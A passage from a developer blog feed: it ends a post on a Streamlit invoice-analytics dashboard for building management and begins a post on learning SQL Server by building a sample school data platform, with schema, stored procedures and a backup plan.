&lt;p&gt;&lt;strong&gt;Built in 1 day&lt;/strong&gt; as a side project during my working hours.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Origin story:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Started in the &lt;code&gt;southB/&lt;/code&gt; directory of my &lt;a href="https://github.com/lfariabr/masters-swe-ai/tree/main/2025-T2/T2-Extra/southB" rel="noopener noreferrer"&gt;masters-swe-ai repo&lt;/a&gt; as a quick experiment. When I realized how useful it was, I:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Cleaned up the code&lt;/li&gt;
&lt;li&gt;Made it modular&lt;/li&gt;
&lt;li&gt;Created standalone repo&lt;/li&gt;
&lt;li&gt;Wrote comprehensive documentation&lt;/li&gt;
&lt;li&gt;Deployed publicly&lt;/li&gt;
&lt;/ol&gt;




&lt;h2&gt;
  
  
  🔗 Links &amp;amp; Resources
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Resource&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;GitHub Repo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/invoice-ledger" rel="noopener noreferrer"&gt;github.com/lfariabr/invoice-ledger&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Source Code (southB origin)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/masters-swe-ai/tree/main/2025-T2/T2-Extra/southB" rel="noopener noreferrer"&gt;masters-swe-ai/southB&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Live Demo&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://invoice-ledger.streamlit.app/" rel="noopener noreferrer"&gt;streamlit app&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Excel Template (fake data)&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;a href="https://github.com/lfariabr/invoice-ledger/raw/main/data/invoiceLedger.xlsx" rel="noopener noreferrer"&gt;download &amp;amp; explore the data safely - &lt;em&gt;fake data&lt;/em&gt;&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;h2&gt;
  
  
  🚀 Future Roadmap: From Dashboard to PropTech Platform
&lt;/h2&gt;

&lt;p&gt;While the current version solves the immediate problem, here's the possible expansion plan:&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;1. Database Backend (PostgreSQL/Supabase)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Current:&lt;/strong&gt; Upload Excel each time&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Future:&lt;/strong&gt; Persistent database with incremental updates&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Benefits:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Historical version control&lt;/li&gt;
&lt;li&gt;Audit trail (who queried what, when)&lt;/li&gt;
&lt;li&gt;Multi-user access with authentication&lt;/li&gt;
&lt;li&gt;API for integration with other building systems&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;2. Predictive Analytics (ML)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Use cases:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;em&gt;"Based on 4 years of data, predict next quarter's HVAC spending"&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;"Which contractors are trending expensive year-over-year?"&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;em&gt;"Seasonal patterns: fire services spike in winter?"&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Technical approach:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Time-series forecasting (Prophet)&lt;/li&gt;
&lt;li&gt;Contractor spending clustering&lt;/li&gt;
&lt;li&gt;Anomaly detection for unusual invoices&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;3. Automated Reporting&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;What it does:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
Schedule weekly/monthly reports via email&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Example workflows:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Every Monday: Summary of last week's spending&lt;/li&gt;
&lt;li&gt;End of month: PDF report with charts for Owners Corporation&lt;/li&gt;
&lt;li&gt;Budget alerts: Email if spending exceeds threshold&lt;/li&gt;
&lt;/ul&gt;




&lt;h3&gt;
  
  
  &lt;strong&gt;4. Integration with Building Management Systems&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Current:&lt;/strong&gt; Standalone dashboard&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Future:&lt;/strong&gt; Connect to existing PropTech stack&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Integrations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AFSS systems&lt;/strong&gt; — Auto-import fire inspection costs&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Strata software&lt;/strong&gt; — Sync budget approvals&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Contractor portals&lt;/strong&gt; — Pull invoices directly&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Power BI&lt;/strong&gt; — Feed data to enterprise dashboards&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  Let's Connect!
&lt;/h2&gt;

&lt;p&gt;Building Invoice Ledger Analytics was a perfect case for me to &lt;strong&gt;turn operational friction into engineering opportunity&lt;/strong&gt;. If you're:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Working in &lt;strong&gt;PropTech&lt;/strong&gt; or building management&lt;/li&gt;
&lt;li&gt;Building internal tools for &lt;strong&gt;finance&lt;/strong&gt; or &lt;strong&gt;operations&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Interested in &lt;strong&gt;Python automation&lt;/strong&gt; and &lt;strong&gt;data visualization&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Looking for practical &lt;strong&gt;Streamlit&lt;/strong&gt; examples&lt;/li&gt;
&lt;li&gt;Hiring for &lt;strong&gt;backend/data/PropTech&lt;/strong&gt; roles&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;I'd love to connect:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;LinkedIn:&lt;/strong&gt; &lt;a href="https://www.linkedin.com/in/lfariabr/" rel="noopener noreferrer"&gt;linkedin.com/in/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;GitHub:&lt;/strong&gt; &lt;a href="https://github.com/lfariabr" rel="noopener noreferrer"&gt;github.com/lfariabr&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Portfolio:&lt;/strong&gt; &lt;a href="https://luisfaria.dev" rel="noopener noreferrer"&gt;luisfaria.dev&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;strong&gt;Tech Stack Summary:&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Current&lt;/th&gt;
&lt;th&gt;Future Extensions&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Python, Streamlit, Pandas, openpyxl&lt;/td&gt;
&lt;td&gt;PostgreSQL/Supabase, ML (Prophet/LangChain), Building System APIs (AFSS, Strata), React Native/PWA&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;




&lt;p&gt;&lt;em&gt;Built with ☕ and firsthand building management experience&lt;/em&gt;&lt;br&gt;&lt;br&gt;
&lt;em&gt;"The best code is the code that quietly removes friction from people's work."&lt;/em&gt;&lt;/p&gt;

</description>
      <category>python</category>
      <category>dataengineering</category>
      <category>automation</category>
      <category>proptech</category>
    </item>
    <item>
      <title>Learning SQL Server the Hard Way: 16 Days of Real-World Database Work</title>
      <dc:creator>Luis Faria</dc:creator>
      <pubDate>Mon, 26 Jan 2026 21:34:03 +0000</pubDate>
      <link>https://forem.com/lfariaus/learning-sql-server-the-hard-way-16-days-of-real-world-database-work-5hla</link>
      <guid>https://forem.com/lfariaus/learning-sql-server-the-hard-way-16-days-of-real-world-database-work-5hla</guid>
      <description>&lt;p&gt;&lt;strong&gt;From "I've never used SQL Server" to "Here's my 1,000-line operational runbook": How I turned a job opportunity into a portfolio-building sprint.&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Hard work is my preferred language and I try to speak it fluently.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🎯 The Opportunity
&lt;/h2&gt;

&lt;h3&gt;
  
  
  When "I Don't Know SQL Server" Becomes a Challenge
&lt;/h3&gt;

&lt;p&gt;A friend reached out with an intriguing proposition: &lt;em&gt;"Do you work with Microsoft SQL Server? We're desperate to fill a school data administrator role."&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;My honest answer? &lt;strong&gt;No—but I know databases.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;My background spans PostgreSQL, MySQL, MongoDB, and GraphQL. I've built ETL pipelines, optimized queries, designed schemas, and managed production data systems. The fundamentals are universal: normalization, indexing, backup strategies, referential integrity, stored procedures.&lt;/p&gt;

&lt;p&gt;SQL Server syntax? Just a dialect I hadn't learned yet.&lt;/p&gt;

&lt;p&gt;But here's the thing about job opportunities in unfamiliar territory: &lt;strong&gt;saying "I can learn it" isn't enough.&lt;/strong&gt; Hiring managers hear that every day. What they want is proof.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Real Challenge
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Can I go from zero SQL Server experience to interview-ready in two weeks, with portfolio-quality deliverables to prove it?&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;This wasn't just about learning T-SQL syntax. The role required:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Managing school data systems (student records, attendance, class scheduling)&lt;/li&gt;
&lt;li&gt;Running reports for leadership and teaching staff&lt;/li&gt;
&lt;li&gt;Integrating data from legacy systems like SEQTA and Synergetic&lt;/li&gt;
&lt;li&gt;Maintaining backup/recovery procedures&lt;/li&gt;
&lt;li&gt;Documenting operations for non-technical staff&lt;/li&gt;
&lt;li&gt;Operating responsibly with child-safety-sensitive data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;The approach:&lt;/strong&gt; Treat it like a master's assignment. I've spent months tackling academic projects with a disciplined workflow: &lt;em&gt;Receive Brief → Research → Design → Build → Document → Present → NEXT.&lt;/em&gt; Why not leverage that momentum?&lt;/p&gt;

&lt;p&gt;This is where strategic use of LLMs came into play. Instead of aimlessly "learning SQL Server," I needed a structured challenge that would simulate real-world job responsibilities.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Prompt That Launched the Project
&lt;/h3&gt;

&lt;p&gt;The prompt:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;"I need to demonstrate enterprise-level SQL Server skills for a school data administrator role. Create a comprehensive 3-level assessment covering: (1) database fundamentals and backup/restore, (2) reporting and data integration, (3) operational documentation and training. Structure it like an internal deliverable with real-world scenarios matching school systems like SEQTA and Synergetic."&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Problem
&lt;/h2&gt;

&lt;p&gt;Build a "School Data Platform" on SQL Server, documented like an internal deliverable. &lt;em&gt;Do the deed and show the proof&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;The structure emerged as a 3-level assessment simulation &lt;code&gt;(Level 1 → Level 2 → Level 3)&lt;/code&gt;, matching exactly what the role calls for:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Assessment Level&lt;/th&gt;
&lt;th&gt;Focus Area&lt;/th&gt;
&lt;th&gt;Real-World Equivalent&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Level 1&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Database Fundamentals&lt;/td&gt;
&lt;td&gt;"Won't break production"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Level 2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Data Integration &amp;amp; Reporting&lt;/td&gt;
&lt;td&gt;"Can generate reports and move data between systems"&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Level 3&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Production Operations&lt;/td&gt;
&lt;td&gt;"Documents well, trains staff, operates safely"&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;📦 &lt;a href="https://github.com/lfariabr/stc-datalab" rel="noopener noreferrer"&gt;StC DataLab Repo&lt;/a&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  Execution Plan (Dec 2025 - Jan 2026)
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Date&lt;/th&gt;
&lt;th&gt;Focus&lt;/th&gt;
&lt;th&gt;Deliverables&lt;/th&gt;
&lt;th&gt;Status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 20-21&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Setup &amp;amp; Schema&lt;/td&gt;
&lt;td&gt;SQL Server Express + SSMS installation, DB creation, table structure&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 22-23&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Backup &amp;amp; Restore&lt;/td&gt;
&lt;td&gt;Full backup/restore procedures, documentation with screenshots&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 24-25&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Data Generation&lt;/td&gt;
&lt;td&gt;Realistic seed data with edge cases&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 26-27&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Reporting Views&lt;/td&gt;
&lt;td&gt;Student profiles, class rolls, attendance summaries&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 28-29&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Stored Procedures&lt;/td&gt;
&lt;td&gt;Parameter-based queries, optimization&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Dec 30-31&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Import/Export&lt;/td&gt;
&lt;td&gt;CSV handling, staging tables, data validation&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Jan 1-2&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Runbook &amp;amp; Documentation&lt;/td&gt;
&lt;td&gt;Operational procedures, troubleshooting guide&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Jan 3-4&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Demo Preparation&lt;/td&gt;
&lt;td&gt;Presentation script, screenshots, talking points&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Jan 5&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Final Review&lt;/td&gt;
&lt;td&gt;Validate all components, practice demo&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/search?q=repo%3Alfariabr%2Fmasters-swe-ai++stc+OR+%28stc%29+OR+std+OR+%28std%29&amp;amp;type=commits&amp;amp;s=committer-date&amp;amp;o=desc" rel="noopener noreferrer"&gt;Complete changelog with 30+ commits&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  🤖 The Solution
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Building an Enterprise Data Infrastructure
&lt;/h3&gt;

&lt;p&gt;What started as "learn SQL Server syntax" evolved into a complete operational simulation. Here's what I built:&lt;/p&gt;

&lt;h3&gt;
  
  
  System Architecture
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fszt4gnqj361vgjgkydvl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fszt4gnqj361vgjgkydvl.png" alt="Mermaid Diagram with Data Flow" width="800" height="199"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/lfariabr/stc-datalab/blob/master/screenshots/ArchitectureOverview.jpeg" rel="noopener noreferrer"&gt;See it in full size&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Database Architecture&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;The foundation is a normalized relational database representing a school's core operational data:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Core Tables (6):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Students&lt;/strong&gt; (200 records) — Privacy-sensitive fields including medical info, emergency contacts, and boarding status&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Staff&lt;/strong&gt; (20 records) — Role-based attributes (Teacher, Principal, ICT, Admin, Counselor)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Subjects&lt;/strong&gt; (12 records) — Curriculum structure covering Math, English, Science, Humanities, Arts, Technology&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Classes&lt;/strong&gt; (30 records) — Teacher assignments, room scheduling, year level groupings&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Enrollments&lt;/strong&gt; (500 records) — Student-class relationships with status tracking (Active, Withdrawn, Completed, Pending)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Attendance&lt;/strong&gt; (800 records) — Daily tracking with status codes (Present, Absent, Late, Excused) across 10 days&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Design Principles:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Example: Students table with constraints&lt;/span&gt;
&lt;span class="k"&gt;CREATE&lt;/span&gt; &lt;span class="k"&gt;TABLE&lt;/span&gt; &lt;span class="n"&gt;Students&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;student_id&lt;/span&gt; &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;IDENTITY&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;PRIMARY&lt;/span&gt; &lt;span class="k"&gt;KEY&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;student_number&lt;/span&gt; &lt;span class="n"&gt;NVARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;UNIQUE&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;first_name&lt;/span&gt; &lt;span class="n"&gt;NVARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;50&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;medical_info&lt;/span&gt; &lt;span class="n"&gt;NVARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;500&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="c1"&gt;-- Privacy sensitive&lt;/span&gt;
    &lt;span class="n"&gt;emergency_contact&lt;/span&gt; &lt;span class="n"&gt;NVARCHAR&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="n"&gt;enrollment_year&lt;/span&gt; &lt;span class="nb"&gt;INT&lt;/span&gt; &lt;span class="k"&gt;NOT&lt;/span&gt; &lt;span class="k"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;INDEX&lt;/span&gt; &lt;span class="n"&gt;idx_enrollment_year&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;enrollment_year&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;
    &lt;span class="k"&gt;INDEX&lt;/span&gt; &lt;span class="n"&gt;idx_student_number&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;student_number&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;strong&gt;Operational Features&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;1. Reporting Views (4 core views)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;vw_StudentProfile&lt;/code&gt; — Complete student records with emergency contacts&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;vw_ClassRoll&lt;/code&gt; — Daily attendance with class lists and teacher assignments&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;vw_AttendanceDaily&lt;/code&gt; — Roll call summaries with absence follow-up contacts&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;vw_EnrollmentSummary&lt;/code&gt; — Class capacity planning with utilization metrics&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Stored Procedures (4 parameterized)&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;sp_GetStudentProfile&lt;/code&gt; — Multi-result set with profile + enrollments + attendance&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sp_EnrollmentSummaryByYear&lt;/code&gt; — Year-level filtering with capacity indicators&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sp_AttendanceByDate&lt;/code&gt; — Date range queries for specific time periods&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sp_GetTableDataExport&lt;/code&gt; — Generic data export for Power BI integration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Data Integration Pipeline&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;CSV import staging tables with validation rules&lt;/li&gt;
&lt;li&gt;Referential integrity checks before production load&lt;/li&gt;
&lt;li&gt;Error logging and rollback procedures&lt;/li&gt;
&lt;li&gt;Export functionality for SEQTA/Power BI sync&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Backup &amp;amp; Recovery&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Full backup T-SQL scripts (SQL Server Express compatible)&lt;/li&gt;
&lt;li&gt;Differential backup procedures&lt;/li&gt;
&lt;li&gt;Three-stage restore validation (verify → test → production)&lt;/li&gt;
&lt;li&gt;RPO: 1 hour | RTO: 30 minutes&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;How It Works in Practice&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Scenario 1: Morning Roll Call&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Teacher logs in at 8:45 AM, needs today's class roll&lt;/span&gt;
&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_AttendanceByDate&lt;/span&gt; 
    &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="n"&gt;StartDate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'2025-01-22'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; 
    &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="n"&gt;EndDate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;'2025-01-22'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;-- Returns: Student list with attendance status, emergency contacts for absences&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Scenario 2: Semester Planning&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- Leadership needs Year 7 enrollment metrics for 2026 planning&lt;/span&gt;
&lt;span class="k"&gt;EXEC&lt;/span&gt; &lt;span class="n"&gt;sp_EnrollmentSummaryByYear&lt;/span&gt; &lt;span class="o"&gt;@&lt;/span&gt;&lt;span class="n"&gt;EnrollmentYear&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2026&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="c1"&gt;-- Returns: Class utilization, capacity warnings, subject distribution&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Scenario 3: System Integration&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="c1"&gt;-- SEQTA export runs daily at 6 AM, imports new attendance data&lt;/span&gt;
&lt;span class="c1"&gt;-- 1. Load CSV into staging table&lt;/span&gt;
&lt;span class="c1"&gt;-- 2. Validate referential integrity (all student_ids exist)&lt;/span&gt;
&lt;span class="c1"&gt;-- 3. Merge into production Attendance table&lt;/span&gt;
&lt;span class="c1"&gt;-- 4. Log success/failures for monitoring&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  &lt;strong&gt;Data Quality by Design&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Intentional edge cases throughout the seed data:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;NULL values&lt;/strong&gt; — Missing phone numbers (9%), NULL emergency contacts&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Casing inconsistencies&lt;/strong&gt; — Lowercase first names, uppercase emails, trailing spaces&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;International scenarios&lt;/strong&gt; — Singapore/Jakarta addresses for boarding students&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Duplicate data&lt;/strong&gt; — Shared email addresses to test deduplication logic&lt;/li&gt;
&lt;li&gt;
